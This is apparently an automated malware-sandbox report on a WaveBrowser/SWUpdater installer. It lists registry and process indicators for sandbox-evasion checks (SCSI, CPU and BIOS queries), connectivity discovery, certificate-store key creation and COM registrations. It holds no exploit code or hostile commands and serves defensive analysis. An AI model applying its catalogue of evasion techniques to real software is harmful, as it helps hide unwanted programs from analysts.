SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4324 SWUpdater.exe 6964 SWUpdater.exe -
Checks SCSI registry key(s) 3 TTPs 30 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID Process not Found -
Checks processor information in registry 2 TTPs 21 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Process not Found -
Delays execution with timeout.exe 1 IoCs
pid Process 2092 Process not Found -
Enumerates system info in registry 2 TTPs 19 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer wavebrowser.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS wavebrowser.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName wavebrowser.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates Process not Found Key created \REGISTRY\USER\.DEFAULT\Software Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft Process not Found Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133687297353923271" wavebrowser.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA Process not Found Key created \REGISTRY\USER\.DEFAULT\Software Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft Process not Found Key created \REGISTRY\USER\.DEFAULT\Software Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA Process not Found Key created \REGISTRY\USER\.DEFAULT\Software Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates Process not Found -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{50363C3E-2FB2-4EC0-A827-CD3314F526C5}\NumMethods\ = "10" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{7DFF302B-EA41-49F8-97B1-9413CEF98C68}\ProxyStubClsid32 SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{44367D77-92C0-45E8-840D-0C098E650CE8}\NumMethods SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\CLSID SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{6130C56B-9B2C-4D5D-8160-C7A583B5DC3B}\ProxyStubClsid32 SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{C0151E6C-8D24-485D-BEC8-B6C6C82E26E8}\ProxyStubClsid32 SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\WOW6432Node\Interface\{DA4EFC2D-B243-4BA8-8A14-8937D867B699}\ = "IAppBundle" SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\WOW6432Node\CLSID\{1BE9D40C-2307-4213-830E-7E3CE9EDF0C2}\VersionIndependentProgID SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{068FAC78-4F23-4F74-99A0-F7C4797D5ECA} SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\WOW6432Node\Interface\{C0151E6C-8D24-485D-BEC8-B6C6C82E26E8}\ = "IPolicyStatus2" SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{64A19E70-BCFF-4808-A320-774FD11571E5}\ProxyStubClsid32 SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{068FAC78-4F23-4F74-99A0-F7C4797D5ECA}\NumMethods SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{97518FC7-7CA2-4921-BC40-F4A07E221C1C}\NumMethods\ = "10" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\WOW6432Node\CLSID\{D12748C8-5013-45E2-9A24-2FB7C2EEFB7C}\LocalServer32 SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{DDF98EF0-2728-4A8D-8B0F-32627DC56437}\NumMethods SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\WOW6432Node\Interface\{7DFF302B-EA41-49F8-97B1-9413CEF98C68} SWUpdater.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\WOW6432Node\Interface\{DA4EFC2D-B243-4BA8-8A14-8937D867B699}\ProxyStubClsid32\ = "{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF}" SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{7DFF302B-EA41-49F8-97B1-9413CEF98C68}\NumMethods SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{B2083DCC-1D29-45E6-8386-BEE1488D11AA} SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\WaveBrwsHTM.ZXZFO5MTUBII74EOZKURCGV7MY\AppUserModelId = "WaveBrowser.ZXZFO5MTUBII74EOZKURCGV7MY" setup.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\.pdf setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{CEF9DF20-AE5B-4A54-B479-9C2AFC1C2683}\ProxyStubClsid32\ = "{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF}" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{E44DDEE0-3097-499E-9DD5-7D5D5DCC401D}\NumMethods SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\WOW6432Node\Interface\{3BE77C6E-0029-4F24-B677-32C9E15CD8F1}\NumMethods\ = "4" SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\WOW6432Node\Interface\{894ADE70-1E5F-4520-A281-CE3BF0309CE6}\ProxyStubClsid32 SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\WavesorSWUpdater.CredentialDialogUser\CurVer SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\WOW6432Node\Interface\{64A19E70-BCFF-4808-A320-774FD11571E5}\NumMethods SWUpdater.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{50363C3E-2FB2-4EC0-A827-CD3314F526C5}\NumMethods\ = "10" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{6130C56B-9B2C-4D5D-8160-C7A583B5DC3B}\NumMethods SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{730EBDF4-7AD2-4516-BF1A-6C6F28C60CF9} SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{8129608C-48BD-42A6-9EBC-7B0933A5CFA3}\NumMethods SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{62A51DF2-CCB8-4DD9-9069-34B8461617FC}\NumMethods SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{730EBDF4-7AD2-4516-BF1A-6C6F28C60CF9}\ProxyStubClsid32\ = "{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF}" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\WOW6432Node\Interface\{E4E4854F-9D7B-4120-A207-CF52C875F08E} SWUpdater.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\WOW6432Node\Interface\{617E37E1-AC79-4162-BACC-C797A1D31D3E}\ProxyStubClsid32\ = "{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF}" SWUpdater.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{0D311A22-BD24-4C7A-8FC1-117F8D62A781}\ProxyStubClsid32\ = "{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF}" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{97518FC7-7CA2-4921-BC40-F4A07E221C1C}\ProxyStubClsid32\ = "{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF}" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{E4E4854F-9D7B-4120-A207-CF52C875F08E}\ = "IProcessLauncher2" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{E4E159E0-7B9C-4D75-AC11-A80628173DE3}\ProxyStubClsid32 SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{E44DDEE0-3097-499E-9DD5-7D5D5DCC401D}\ProxyStubClsid32 SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\CLSID\{DB982438-E7B9-46E1-AF0F-CFD8947957E8}\InprocHandler32\ = "C:\\Users\\Admin\\Wavesor Software\\SWUpdater\\1.3.135.0\\psuser_64.dll" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{6130C56B-9B2C-4D5D-8160-C7A583B5DC3B}\ = "IApp2" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\WOW6432Node\CLSID\{1BE9D40C-2307-4213-830E-7E3CE9EDF0C2}\LocalServer32\ = "\"C:\\Users\\Admin\\Wavesor Software\\SWUpdater\\1.3.135.0\\SWUpdaterOnDemand.exe\"" SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\CLSID\{9CD78CBC-FD21-4FFF-B452-9D792A58B7C4}\LocalServer32 setup.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{CFDE680E-8700-4808-BAAF-8B1F50F2CC87}\ProxyStubClsid32 SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{CFDE680E-8700-4808-BAAF-8B1F50F2CC87}\NumMethods\ = "12" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\WOW6432Node\Interface\{C0151E6C-8D24-485D-BEC8-B6C6C82E26E8}\NumMethods SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\WOW6432Node\Interface\{44367D77-92C0-45E8-840D-0C098E650CE8} SWUpdater.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{50363C3E-2FB2-4EC0-A827-CD3314F526C5}\ProxyStubClsid32\ = "{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF}" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{068FAC78-4F23-4F74-99A0-F7C4797D5ECA}\ProxyStubClsid32 SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\WOW6432Node\Interface\{E4E4854F-9D7B-4120-A207-CF52C875F08E}\ = "IProcessLauncher2" SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{3BE77C6E-0029-4F24-B677-32C9E15CD8F1} SWUpdaterComRegisterShell64.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4182098368-2521458979-3782681353-1000\{C02D9CAC-C308-472E-A51C-464EAD3CF348} chrome.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\WOW6432Node\Interface\{E4E4854F-9D7B-4120-A207-CF52C875F08E}\NumMethods SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{E053F7BD-D525-49F4-9ADE-5D7E6FCEE775}\NumMethods 